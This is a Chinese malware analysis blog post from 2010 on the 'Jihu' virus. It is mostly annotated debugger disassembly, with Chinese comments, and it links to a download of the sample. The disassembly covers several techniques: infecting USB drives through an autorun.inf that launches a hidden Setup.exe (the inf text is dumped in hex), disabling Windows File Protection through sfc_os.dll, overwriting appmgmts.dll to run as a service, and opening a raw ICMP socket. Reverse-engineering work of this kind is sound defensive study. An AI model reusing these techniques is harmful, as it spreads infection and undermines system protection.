00876E8D   .  68 1F000F00   push    0F001F                           ; |AccessMode = F001F
00876E92   .  FF75 D0       push    dword ptr [ebp-30]               ; |hMapObject
00876E95   .  FF15 60918700 call    dword ptr [<&KERNEL32.MapViewOfF>; \MapViewOfFile
00876FB0   .  68 00040000   push    400                              ; /FlushSize = 400
00876FB5   .  FF75 D8       push    dword ptr [ebp-28]               ; |FlushBase
00876FB8   .  FF15 94908700 call    dword ptr [<&KERNEL32.FlushViewO>; \FlushViewOfFile
00877304   .  FF75 D8       push    dword ptr [ebp-28]               ; /BaseAddress
00877307   .  FF15 64918700 call    dword ptr [<&KERNEL32.UnmapViewO>; \UnmapViewOfFile
0087730D   .  FF75 D0       push    dword ptr [ebp-30]               ; /hObject
00877310   .  FF15 10918700 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00877316   .  8365 D8 00    and     dword ptr [ebp-28], 0
0087731A   .  8365 D0 00    and     dword ptr [ebp-30], 0
0087731E   .  6A 02         push    2                                ; /Origin = FILE_END
00877320   .  6A 00         push    0                                ; |pOffsetHi = NULL
00877322   .  8B85 18FFFFFF mov     eax, dword ptr [ebp-E8]          ; |
00877328   .  0345 AC       add     eax, dword ptr [ebp-54]          ; |
0087732B   .  50            push    eax                              ; |OffsetLo
0087732C   .  FF75 98       push    dword ptr [ebp-68]               ; |hFile
0087732F   .  FF15 28918700 call    dword ptr [<&KERNEL32.SetFilePoi>; \SetFilePointer
00877335   .  FF75 98       push    dword ptr [ebp-68]               ; /hFile
00877338   .  FF15 30918700 call    dword ptr [<&KERNEL32.SetEndOfFi>; \SetEndOfFile

线程A5：
感染可移动磁盘


008787A4   .  68 80000000   push    80                               ; /FileAttributes = NORMAL
008787A9   .  8D85 E8FDFFFF lea     eax, dword ptr [ebp-218]         ; |
008787AF   .  50            push    eax                              ; |FileName
008787B0   .  FF15 80908700 call    dword ptr [<&KERNEL32.SetFileAtt>; \SetFileAttributesA
008787B6   .  68 80000000   push    80                               ; /设置文件属性recycle.{645FF040-5081-101B-9F08-00AA002F954E}
008787E0   .  50            push    eax                              ; /Path = "MZ",90,"autorun.inf"
008787E1   .  FF15 F0918700 call    dword ptr [<&SHLWAPI.PathFileExi>; \PathFileExistsA
008787E7   .  83F8 01       cmp     eax, 1                           ;  判断autorun.inf是否存在
00878955   > \6A 00         push    0                                ; /hTemplateFile = NULL
00878957   .  68 80000000   push    80                               ; |Attributes = NORMAL
0087895C   .  6A 02         push    2                                ; |Mode = CREATE_ALWAYS
0087895E   .  6A 00         push    0                                ; |pSecurity = NULL
00878960   .  6A 00         push    0                                ; |ShareMode = 0
00878962   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00878967   .  8D85 D8F4FFFF lea     eax, dword ptr [ebp-B28]         ; |
0087896D   .  50            push    eax                              ; |FileName
0087896E   .  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878974   .  8985 E4FDFFFF mov     dword ptr [ebp-21C], eax         ;  创建autorun.inf
00878988   > \6A 00         push    0                                ; /pOverlapped = NULL
0087898A   .  8D85 F4FEFFFF lea     eax, dword ptr [ebp-10C]         ; |
00878990   .  50            push    eax                              ; |pBytesWritten
00878991   .  8D85 E0F5FFFF lea     eax, dword ptr [ebp-A20]         ; |
00878997   .  50            push    eax                              ; |/String
00878998   .  FF15 D0908700 call    dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA
0087899E   .  50            push    eax                              ; |nBytesToWrite
0087899F   .  8D85 E0F5FFFF lea     eax, dword ptr [ebp-A20]         ; |
008789A5   .  50            push    eax                              ; |Buffer = 0006EC78
008789A6   .  FFB5 E4FDFFFF push    dword ptr [ebp-21C]              ; |hFile
008789AC   .  FF15 E0908700 call    dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
008789B2   .  FFB5 E4FDFFFF push    dword ptr [ebp-21C]              ; /写入以下内容
0006EC78  5B 61 75 74 6F 72 75 6E 5D 0D 0A 4F 50 45 4E 3D  [autorun]..OPEN=
0006EC88  72 65 63 79 63 6C 65 2E 7B 36 34 35 46 46 30 34  recycle.{645FF04
0006EC98  30 2D 35 30 38 31 2D 31 30 31 42 2D 39 46 30 38  0-5081-101B-9F08
0006ECA8  2D 30 30 41 41 30 30 32 46 39 35 34 45 7D 5C 53  -00AA002F954E}\S
0006ECB8  65 74 75 70 2E 65 78 65 0D 0A 73 68 65 6C 6C 5C  etup.exe..shell\
0006ECC8  6F 70 65 6E 3D B4 F2 BF AA 28 26 4F 29 0D 0A 73  open=打开(&O)..s
0006ECD8  68 65 6C 6C 5C 6F 70 65 6E 5C 43 6F 6D 6D 61 6E  hell\open\Comman
0006ECE8  64 3D 72 65 63 79 63 6C 65 2E 7B 36 34 35 46 46  d=recycle.{645FF
0006ECF8  30 34 30 2D 35 30 38 31 2D 31 30 31 42 2D 39 46  040-5081-101B-9F
0006ED08  30 38 2D 30 30 41 41 30 30 32 46 39 35 34 45 7D  08-00AA002F954E}
0006ED18  5C 53 65 74 75 70 2E 65 78 65 20 53 68 6F 77 0D  \Setup.exe Show.
0006ED28  0A 73 68 65 6C 6C 5C 6F 70 65 6E 5C 44 65 66 61  .shell\open\Defa
0006ED38  75 6C 74 3D 31 2F 2F 0D 0A 73 68 65 6C 6C 5C 65  ult=1//..shell\e
0006ED48  78 70 6C 6F 72 65 3D D7 CA D4 B4 B9 DC C0 ED C6  xplore=资源管理
0006ED58  F7 28 26 58 29 0D 0A 73 68 65 6C 6C 5C 65 78 70  ?&X)..shell\exp
0006ED68  6C 6F 72 65 5C 43 6F 6D 6D 61 6E 64 3D 72 65 63  lore\Command=rec
0006ED78  79 63 6C 65 2E 7B 36 34 35 46 46 30 34 30 2D 35  ycle.{645FF040-5
0006ED88  30 38 31 2D 31 30 31 42 2D 39 46 30 38 2D 30 30  081-101B-9F08-00
0006ED98  41 41 30 30 32 46 39 35 34 45 7D 5C 53 65 74 75  AA002F954E}\Setu
0006EDA8  70 2E 65 78 65 20 53 68 6F 77                    p.exe Show
008789BE   .  6A 00         push    0                                ; /pSecurity = NULL
008789C0   .  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ; |
008789C6   .  50            push    eax                              ; |Path
008789C7   .  FF15 84908700 call    dword ptr [<&KERNEL32.CreateDire>; \CreateDirectoryA
008789CD   .  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ;  创建目录recycle.{645FF040-5081-101B-9F08-00AA002F954E}
008789F0   > \6A 00         push    0                                ; /hTemplateFile = NULL
008789F2   .  68 80000000   push    80                               ; |Attributes = NORMAL
008789F7   .  6A 02         push    2                                ; |Mode = CREATE_ALWAYS
008789F9   .  6A 00         push    0                                ; |pSecurity = NULL
008789FB   .  6A 00         push    0                                ; |ShareMode = 0
008789FD   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00878A02   .  8D85 E8FDFFFF lea     eax, dword ptr [ebp-218]         ; |
00878A08   .  50            push    eax                              ; |FileName
00878A09   .  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878A0F   .  8985 E4FDFFFF mov     dword ptr [ebp-21C], eax         ;  创建recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe

线程A6(无限循环):


0878043   .  6A 40         push    40                               ; /BufSize = 40 (64.)
00878045   .  8D85 28FEFFFF lea     eax, dword ptr [ebp-1D8]         ; |
0087804B   .  50            push    eax                              ; |Buffer
0087804C   .  FF15 74928700 call    dword ptr [<&WS2_32.#57>]        ; \gethostname
00878052   .  8D85 28FEFFFF lea     eax, dword ptr [ebp-1D8]         ;  得到主机名
00878058   .  50            push    eax                              ; /Name
00878059   .  FF15 2C928700 call    dword ptr [<&WS2_32.#52>]        ; \gethostbyname
00877ABF   > \6A 01         push    1                                ; /Protocol = IPPROTO_ICMP
00877AC1   .  6A 03         push    3                                ; |Type = SOCK_RAW
00877AC3   .  6A 02         push    2                                ; |Family = AF_INET
00877AC5   .  FF15 34928700 call    dword ptr [<&WS2_32.#23>]        ; \socket
00877ACB   .  8945 FC       mov     dword ptr [ebp-4], eax           ;  创建套接字
00877B04   .  FF70 10       push    dword ptr [eax+10]               ; /AddrLen
00877B07   .  8B85 40FAFEFF mov     eax, dword ptr [ebp+FFFEFA40]    ; |
00877B0D   .  FF70 18       push    dword ptr [eax+18]               ; |pSockAddr
00877B10   .  FF75 FC       push    dword ptr [ebp-4]                ; |Socket
00877B13   .  FF15 60928700 call    dword ptr [<&WS2_32.#2>]         ; \bind
00877B19   .  83F8 FF       cmp     eax, -1                          ;  绑定
00877974  |.  6A 00         push    0                                ; /Callback = NULL
00877976  |.  FF75 1C       push    dword ptr [ebp+1C]               ; |pOverlapped
00877979  |.  FF75 18       push    dword ptr [ebp+18]               ; |pFromSize
0087797C  |.  FF75 14       push    dword ptr [ebp+14]               ; |pFrom
0087797F  |.  8D45 F8       lea     eax, dword ptr [ebp-8]           ; |
00877982  |.  50            push    eax                              ; |pFlags
00877983  |.  8D45 F4       lea     eax, dword ptr [ebp-C]           ; |
00877986  |.  50            push    eax                              ; |pReceivedCount
00877987  |.  6A 01         push    1                                ; |nBuffers = 1
00877989  |.  8D45 EC       lea     eax, dword ptr [ebp-14]          ; |
0087798C  |.  50            push    eax                              ; |pBuffers
0087798D  |.  FF75 08       push    dword ptr [ebp+8]                ; |Socket
00877990  |.  FF15 6C928700 call    dword ptr [<&WS2_32.WSARecvFrom>>; \WSARecvFrom
00877996  |.  8945 FC       mov     dword ptr [ebp-4], eax           ;  接受
00877C1C   .  FF70 10       push    dword ptr [eax+10]               ; /ToLength
00877C1F   .  8B85 F4FBFFFF mov     eax, dword ptr [ebp-40C]         ; |
00877C25   .  FF70 18       push    dword ptr [eax+18]               ; |pTo
00877C28   .  6A 00         push    0                                ; |Flags = 0
00877C2A   .  FFB5 B8F9FEFF push    dword ptr [ebp+FFFEF9B8]         ; |DataSize
00877C30   .  8D85 F8FBFFFF lea     eax, dword ptr [ebp-408]         ; |
00877C36   .  50            push    eax                              ; |Data = 0005EA74
00877C37   .  FF75 FC       push    dword ptr [ebp-4]                ; |Socket
00877C3A   .  FF15 64928700 call    dword ptr [<&WS2_32.#20>]        ; \sendto
00877C40   .  83F8 FF       cmp     eax, -1                          ;  发送...

极虎病毒样本分析

零度x — Wed, 16 Jun 2010 13:38:10 +0000

样本下载：http://vip.begin09.com/thread-5745-1-1.html

只分析了exe运行的情况，关闭windows文件保护，更改自身属性为DLL，写入C:\WINDOWS\system32\appmgmts.dll并以服务方式启动，dll下次在分析，今天没时间了~

00401B9A  |.  6A 1C         push    1C                               ; /BufSize = 1C (28.)
00401B9C  |.  8D45 E4       lea     eax, dword ptr [ebp-1C]          ; |
00401B9F  |.  50            push    eax                              ; |Buffer
00401BA0  |.  FF75 E0       push    dword ptr [ebp-20]               ; |Address
00401BA3  |.  FF15 2C914000 call    dword ptr [<&KERNEL32.VirtualQue>; \VirtualQuery
00401BA9  |.  8B45 E8       mov     eax, dword ptr [ebp-18]          ;  VirTualQuery获取内存信息
00401BAC  |.  A3 38DC4000   mov     dword ptr [40DC38], eax
00401BB1  |.  6A 00         push    0                                ; /pModule = NULL
00401BB3  |.  FF15 04914000 call    dword ptr [<&KERNEL32.GetModuleH>; \GetModuleHandleA
00401BB9  |.  3B05 38DC4000 cmp     eax, dword ptr [40DC38]          ;  GetModuleHandle获取当前模块基址
00401BBF  |.  75 16         jnz     short 00401BD7                   ;  两者比较，不要相等则退出线程

00402056   .  FF15 14924000 call    dword ptr [<&USER32.GetInputStat>; [GetInputState
0040205C   .  6A 00         push    0                                ; /lParam = 0
0040205E   .  6A 00         push    0                                ; |wParam = 0
00402060   .  6A 00         push    0                                ; |Message = WM_NULL
00402062   .  FF15 48914000 call    dword ptr [<&KERNEL32.GetCurrent>; |[GetCurrentThreadId
00402068   .  50            push    eax                              ; |ThreadId
00402069   .  FF15 18924000 call    dword ptr [<&USER32.PostThreadMe>; \PostThreadMessageA
0040206F   .  6A 00         push    0                                ; /MsgFilterMax = 0
00402071   .  6A 00         push    0                                ; |MsgFilterMin = 0
00402073   .  6A 00         push    0                                ; |hWnd = NULL
00402075   .  8D85 BCFDFFFF lea     eax, dword ptr [ebp-244]         ; |
0040207B   .  50            push    eax                              ; |pMsg
0040207C   .  FF15 0C924000 call    dword ptr [<&USER32.GetMessageA>>; \GetMessageA
[/courcecode]
[sourcecode]
004064B4  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
004064B9  |.  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]         ; |
004064BF  |.  50            push    eax                              ; |PathBuffer
004064C0  |.  6A 00         push    0                                ; |hModule = NULL
004064C2  |.  FF15 00914000 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004064C8  |.  68 04010000   push    104                              ; /获取当前路径
004064CD  |.  6A 00         push    0                                ; |c = 00
004064CF  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]         ; |
004064D5  |.  50            push    eax                              ; |s
004064D6  |.  E8 67290000   call                 ; \memset
004064DB  |.  83C4 0C       add     esp, 0C
004064DE  |.  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]
004064E4  |.  50            push    eax                              ; /String2
004064E5  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]         ; |
004064EB  |.  50            push    eax                              ; |String1
004064EC  |.  FF15 1C914000 call    dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
004064F2  |.  68 01010000   push    101                              ; /n = 101 (257.)
004064F7  |.  6A 00         push    0                                ; |c = 00
004064F9  |.  8D85 E3FEFFFF lea     eax, dword ptr [ebp-11D]         ; |
004064FF  |.  50            push    eax                              ; |s
00406500  |.  E8 3D290000   call                 ; \memset
00406505  |.  83C4 0C       add     esp, 0C                          ;  保留路径前三个字节(获取当前磁盘)
00406508  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]
0040650E  |.  50            push    eax                              ; /RootPathName
0040650F  |.  FF15 A4904000 call    dword ptr [<&KERNEL32.GetDriveTy>; \GetDriveTypeA
00406515  |.  83F8 02       cmp     eax, 2                           ;  判断当前磁盘类型
00406518  |.  75 39         jnz     short 00406553                   ;  ---------------------------------
0040651A  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]
00406520  |.  50            push    eax                              ; /<%s>
00406521  |.  68 A09A4000   push    00409AA0                         ; |Format = "/n,%s"
00406526  |.  8D85 98FDFFFF lea     eax, dword ptr [ebp-268]         ; |
0040652C  |.  50            push    eax                              ; |s
0040652D  |.  FF15 10924000 call    dword ptr [<&USER32.wsprintfA>]  ; \wsprintfA
00406533  |.  83C4 0C       add     esp, 0C
00406536  |.  6A 05         push    5                                ; /IsShown = 5
00406538  |.  6A 00         push    0                                ; |DefDir = NULL
0040653A  |.  8D85 98FDFFFF lea     eax, dword ptr [ebp-268]         ; |
00406540  |.  50            push    eax                              ; |Parameters
00406541  |.  68 A89A4000   push    00409AA8                         ; |FileName = "explorer.exe"
00406546  |.  68 B89A4000   push    00409AB8                         ; |Operation = "open"
0040654B  |.  6A 00         push    0                                ; |hWnd = NULL
0040654D  |.  FF15 E4914000 call    dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA
00406553  |>  C745 EC C09A4>mov     dword ptr [ebp-14], 00409AC0     ;  ---如果为移动设备则打explorer---
00401681  |> \6A 00         push    0                                ; /hTemplateFile = NULL
00401683  |.  68 80000000   push    80                               ; |Attributes = NORMAL
00401688  |.  FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; |Mode
0040168E  |.  6A 00         push    0                                ; |pSecurity = NULL
00401690  |.  6A 03         push    3                                ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401692  |.  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00401697  |.  68 08934000   push    00409308                         ; |FileName = "C:\DelInfo.bin"
0040169C  |.  FF15 C4904000 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
004016A2  |.  8985 ECFEFFFF mov     dword ptr [ebp-114], eax         ;  创建文件C:\Delinfo.bin

0040175C  |> \6A 00         push    0                                ; /pOverlapped = NULL
0040175E  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00401761  |.  50            push    eax                              ; |pBytesWritten
00401762  |.  6A 04         push    4                                ; |nBytesToWrite = 4
00401764  |.  8D45 0C       lea     eax, dword ptr [ebp+C]           ; |
00401767  |.  50            push    eax                              ; |Buffer
00401768  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; |hFile
0040176E  |.  FF15 E0904000 call    dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
00401774  |.  6A 00         push    0                                ; /写入01000000
00401776  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00401779  |.  50            push    eax                              ; |pBytesWritten
0040177A  |.  FF75 08       push    dword ptr [ebp+8]                ; |/String
0040177D  |.  FF15 D0904000 call    dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA
00401783  |.  50            push    eax                              ; |nBytesToWrite
00401784  |.  FF75 08       push    dword ptr [ebp+8]                ; |Buffer
00401787  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; |hFile
0040178D  |.  FF15 E0904000 call    dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
00401793  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; /01000000之后写入自身路径
00401799  |.  FF15 10914000 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle

00401C0B  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
00401C10  |.  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]         ; |
00401C16  |.  50            push    eax                              ; |PathBuffer
00401C17  |.  FF75 08       push    dword ptr [ebp+8]                ; |hModule
00401C1A  |.  FF15 00914000 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401C20  |.  83A5 E0FEFFFF>and     dword ptr [ebp-120], 0           ;  获取路径
00401C27  |.  EB 0D         jmp     short 00401C36
00401C29  |>  8B85 E0FEFFFF /mov     eax, dword ptr [ebp-120]
00401C2F  |.  40            |inc     eax
00401C30  |.  8985 E0FEFFFF |mov     dword ptr [ebp-120], eax
00401C36  |>  83BD E0FEFFFF> cmp     dword ptr [ebp-120], 32
00401C3D  |.  7D 31         |jge     short 00401C70
00401C3F  |.  6A 00         |push    0                               ; /hTemplateFile = NULL
00401C41  |.  6A 00         |push    0                               ; |Attributes = 0
00401C43  |.  6A 03         |push    3                               ; |Mode = OPEN_EXISTING
00401C45  |.  6A 00         |push    0                               ; |pSecurity = NULL
00401C47  |.  6A 01         |push    1                               ; |ShareMode = FILE_SHARE_READ
00401C49  |.  68 00000080   |push    80000000                        ; |Access = GENERIC_READ
00401C4E  |.  8D85 E8FEFFFF |lea     eax, dword ptr [ebp-118]        ; |
00401C54  |.  50            |push    eax                             ; |FileName
00401C55  |.  FF15 C4904000 |call    dword ptr [<&KERNEL32.CreateFil>; \CreateFileA
00401C5B  |.  8945 F4       |mov     dword ptr [ebp-C], eax          ;  打开自身

00401C70  |> \6A 00         push    0                                ; /pFileSizeHigh = NULL
00401C72  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00401C75  |.  FF15 24914000 call    dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize
00401C7B  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  得到自身大小

00401CEF  |.  6A 00         push    0                                ; /pOverlapped = NULL
00401CF1  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00401CF4  |.  50            push    eax                              ; |pBytesRead
00401CF5  |.  FF75 F8       push    dword ptr [ebp-8]                ; |BytesToRead
00401CF8  |.  FFB5 E4FEFFFF push    dword ptr [ebp-11C]              ; |Buffer
00401CFE  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00401D01  |.  FF15 EC904000 call    dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
00401D07  |.  FF75 F4       push    dword ptr [ebp-C]                ; /把自身读入缓冲区
00401D0A  |.  FF15 10914000 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle

004020AE   .  68 04010000   push    104                              ; /BufSize = 104 (260.)
004020B3   .  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]         ; |
004020B9   .  50            push    eax                              ; |Buffer
004020BA   .  FF15 38914000 call    dword ptr [<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
004020C0   .  68 04010000   push    104                              ; /得到系统目录
004020C5   .  6A 00         push    0                                ; |c = 00
004020C7   .  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]         ; |
004020CD   .  50            push    eax                              ; |s
004020CE   .  E8 6F6D0000   call                 ; \memset
004020D3   .  83C4 0C       add     esp, 0C
004020D6   .  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]
004020DC   .  50            push    eax                              ; /Buffer
004020DD   .  68 04010000   push    104                              ; |BufSize = 104 (260.)
004020E2   .  FF15 4C914000 call    dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA
004020E8   .  68 3F000F00   push    0F003F                           ;  得到临时目录

04020ED   .  6A 00         push    0
004020EF   .  6A 00         push    0
004020F1   .  FF15 18904000 call    dword ptr [<&ADVAPI32.OpenSCMana>;  ADVAPI32.OpenSCManagerA
004020F7   .  8945 FC       mov     dword ptr [ebp-4], eax           ;  打开scm
004020FA   .  68 B0944000   push    004094B0                         ; /FileName = "sfc_os.dll"
004020FF   .  FF15 40914000 call    dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00402105   .  8985 B4F9FFFF mov     dword ptr [ebp-64C], eax         ;  加载sfc_os.dll

0040211E   > \6A 05         push    5                                ; /ProcNameOrOrdinal = #5
00402120   .  FFB5 B4F9FFFF push    dword ptr [ebp-64C]              ; |hModule
00402126   .  FF15 F4904000 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
0040212C   .  A3 44DC4000   mov     dword ptr [40DC44], eax          ;  获取SetSfcFileException

004021B8   > \68 FF010F00   push    0F01FF
004021BD   .  8D85 30F4FFFF lea     eax, dword ptr [ebp-BD0]
004021C3   .  50            push    eax
004021C4   .  FF75 FC       push    dword ptr [ebp-4]
004021C7   .  FF15 14904000 call    dword ptr [<&ADVAPI32.OpenServic>;  ADVAPI32.OpenServiceA
004021CD   .  8985 E0FEFFFF mov     dword ptr [ebp-120], eax         ;  打开AppMgmt(服务管理器)

004021FA   .  50            push    eax
004021FB   .  FFB5 E0FEFFFF push    dword ptr [ebp-120]
00402201   .  FF15 04904000 call    dword ptr [<&ADVAPI32.QueryServi>;  ADVAPI32.QueryServiceStatus
00402207   .  83BD D8F3FFFF>cmp     dword ptr [ebp-C28], 1           ;  查询服务状态

0040225C   .  8D85 F0F3FFFF lea     eax, dword ptr [ebp-C10]
00402262   .  50            push    eax                              ; /<%s>
00402263   .  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]         ; |
00402269   .  50            push    eax                              ; |<%s>
0040226A   .  68 BC944000   push    004094BC                         ; |Format = "%s\system32\%s.dll"
0040226F   .  8D85 A8F8FFFF lea     eax, dword ptr [ebp-758]         ; |
00402275   .  50            push    eax                              ; |s
00402276   .  FF15 10924000 call    dword ptr [<&USER32.wsprintfA>]  ; \wsprintfA
0040227C   .  83C4 10       add     esp, 10                          ;  构造字符串C:\WINDOWS\system32\appmgmts.dll
0040227F   .  8D85 A8F8FFFF lea     eax, dword ptr [ebp-758]
00402285   .  50            push    eax

00401E53   .  FF75 08       push    dword ptr [ebp+8]                            ; /Path = "C:\WINDOWS\system32\appmgmts.dll"
00401E56   .  FF15 F0914000 call    dword ptr [<&SHLWAPI.PathFileExistsA>]       ; \PathFileExistsA
00401E5C   .  83F8 01       cmp     eax, 1                                       ;  判断C:\WINDOWS\system32\appmgmts.dll是否存在

00401E91   .  FFB5 B4F7FFFF push    dword ptr [ebp-84C]                          ; /WideBufSize
00401E97   .  8D85 B8F7FFFF lea     eax, dword ptr [ebp-848]                     ; |
00401E9D   .  50            push    eax                                          ; |WideCharBuf
00401E9E   .  FFB5 B4F7FFFF push    dword ptr [ebp-84C]                          ; |StringSize
00401EA4   .  FF75 08       push    dword ptr [ebp+8]                            ; |StringToMap = "C:\WINDOWS\system32\appmgmts.dll"
00401EA7   .  6A 00         push    0                                            ; |Options = 0
00401EA9   .  6A 00         push    0                                            ; |CodePage = CP_ACP
00401EAB   .  FF15 98904000 call    dword ptr [<&KERNEL32.MultiByteToWideChar>]  ; \MultiByteToWideChar
00401EB1   .  8365 FC 00    and     dword ptr [ebp-4], 0                         ;  转换"C:\WINDOWS\system32\appmgmts.dll"成unicode
00401EB5   .  6A FF         push    -1
00401EB7   .  8D85 B8F7FFFF lea     eax, dword ptr [ebp-848]
00401EBD   .  50            push    eax
00401EBE   .  6A 00         push    0
00401EC0   .  68 F91E4000   push    00401EF9
00401EC5   .  8BFF          mov     edi, edi
00401EC7   .  55            push    ebp
00401EC8   .  A1 44DC4000   mov     eax, dword ptr [40DC44]
00401ECD   .  83C0 03       add     eax, 3
00401ED0   .  FFE0          jmp     eax                                          ;  关闭windows文件保护

0401F14   > \6A 00         push    0                                            ; /hTemplateFile = NULL
00401F16   .  6A 00         push    0                                            ; |Attributes = 0
00401F18   .  FF75 D0       push    dword ptr [ebp-30]                           ; |Mode
00401F1B   .  6A 00         push    0                                            ; |pSecurity = NULL
00401F1D   .  6A 00         push    0                                            ; |ShareMode = 0
00401F1F   .  68 000000C0   push    C0000000                                     ; |Access = GENERIC_READ|GENERIC_WRITE
00401F24   .  FF75 08       push    dword ptr [ebp+8]                            ; |FileName
00401F27   .  FF15 C4904000 call    dword ptr [<&KERNEL32.CreateFileA>]          ; \CreateFileA
00401F2D   .  8945 D4       mov     dword ptr [ebp-2C], eax                      ;  打开C:\WINDOWS\system32\appmgmts.dll

00401F50   .  50            push    eax                                          ; /pLastWrite = 0012F304
00401F51   .  8D45 C0       lea     eax, dword ptr [ebp-40]                      ; |
00401F54   .  50            push    eax                                          ; |pLastAccess
00401F55   .  8D45 B8       lea     eax, dword ptr [ebp-48]                      ; |
00401F58   .  50            push    eax                                          ; |pCreationTime
00401F59   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401F5C   .  FF15 44914000 call    dword ptr [<&KERNEL32.GetFileTime>]          ; \GetFileTime
00401F62   .  837D D0 02    cmp     dword ptr [ebp-30], 2                        ;  获取文件时间

00401F9A   > \6A 00         push    0                                            ; /Origin = FILE_BEGIN
00401F9C   .  6A 00         push    0                                            ; |pOffsetHi = NULL
00401F9E   .  FF75 DC       push    dword ptr [ebp-24]                           ; |OffsetLo
00401FA1   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401FA4   .  FF15 28914000 call    dword ptr [<&KERNEL32.SetFilePointer>]       ; \SetFilePointer
00401FAA   .  A1 3CDC4000   mov     eax, dword ptr [40DC3C]                      ;  设置文件指针到文件偏移3C
00401FAF   .  0345 DC       add     eax, dword ptr [ebp-24]
00401FB2   .  8945 E4       mov     dword ptr [ebp-1C], eax
00401FB5   .  6A 00         push    0                                            ; /pOverlapped = NULL
00401FB7   .  8D45 D8       lea     eax, dword ptr [ebp-28]                      ; |
00401FBA   .  50            push    eax                                          ; |pBytesWritten
00401FBB   .  A1 40DC4000   mov     eax, dword ptr [40DC40]                      ; |
00401FC0   .  2B45 DC       sub     eax, dword ptr [ebp-24]                      ; |
00401FC3   .  50            push    eax                                          ; |nBytesToWrite
00401FC4   .  FF75 E4       push    dword ptr [ebp-1C]                           ; |Buffer
00401FC7   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401FCA   .  FF15 E0904000 call    dword ptr [<&KERNEL32.WriteFile>]            ; \WriteFile
00401FD0   .  85C0          test    eax, eax                                     ;  写入数据C:\WINDOWS\system32\appmgmts.dll

00401FE1   > \6A 00         push    0                                            ; /Origin = FILE_BEGIN
00401FE3   .  6A 00         push    0                                            ; |pOffsetHi = NULL
00401FE5   .  FF35 40DC4000 push    dword ptr [40DC40]                           ; |OffsetLo = 3CC00 (248832.)
00401FEB   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401FEE   .  FF15 28914000 call    dword ptr [<&KERNEL32.SetFilePointer>]       ; \SetFilePointer
00401FF4   .  FF75 D4       push    dword ptr [ebp-2C]                           ; /hFile
00401FF7   .  FF15 30914000 call    dword ptr [<&KERNEL32.SetEndOfFile>]         ; \SetEndOfFile

00401FE1   > \6A 00         push    0                                            ; /Origin = FILE_BEGIN
00401FE3   .  6A 00         push    0                                            ; |pOffsetHi = NULL
00401FE5   .  FF35 40DC4000 push    dword ptr [40DC40]                           ; |OffsetLo = 3CC00 (248832.)
00401FEB   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401FEE   .  FF15 28914000 call    dword ptr [<&KERNEL32.SetFilePointer>]       ; \SetFilePointer
00401FF4   .  FF75 D4       push    dword ptr [ebp-2C]                           ; /hFile
00401FF7   .  FF15 30914000 call    dword ptr [<&KERNEL32.SetEndOfFile>]         ; \SetEndOfFile
00401FFD   .  8D45 C8       lea     eax, dword ptr [ebp-38]                      ;  把自身写进C:\WINDOWS\system32\appmgmts.dll
00402000   .  50            push    eax                                          ; /pLastWrite
00402001   .  8D45 C0       lea     eax, dword ptr [ebp-40]                      ; |
00402004   .  50            push    eax                                          ; |pLastAccess
00402005   .  8D45 B8       lea     eax, dword ptr [ebp-48]                      ; |
00402008   .  50            push    eax                                          ; |pCreationTime
00402009   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
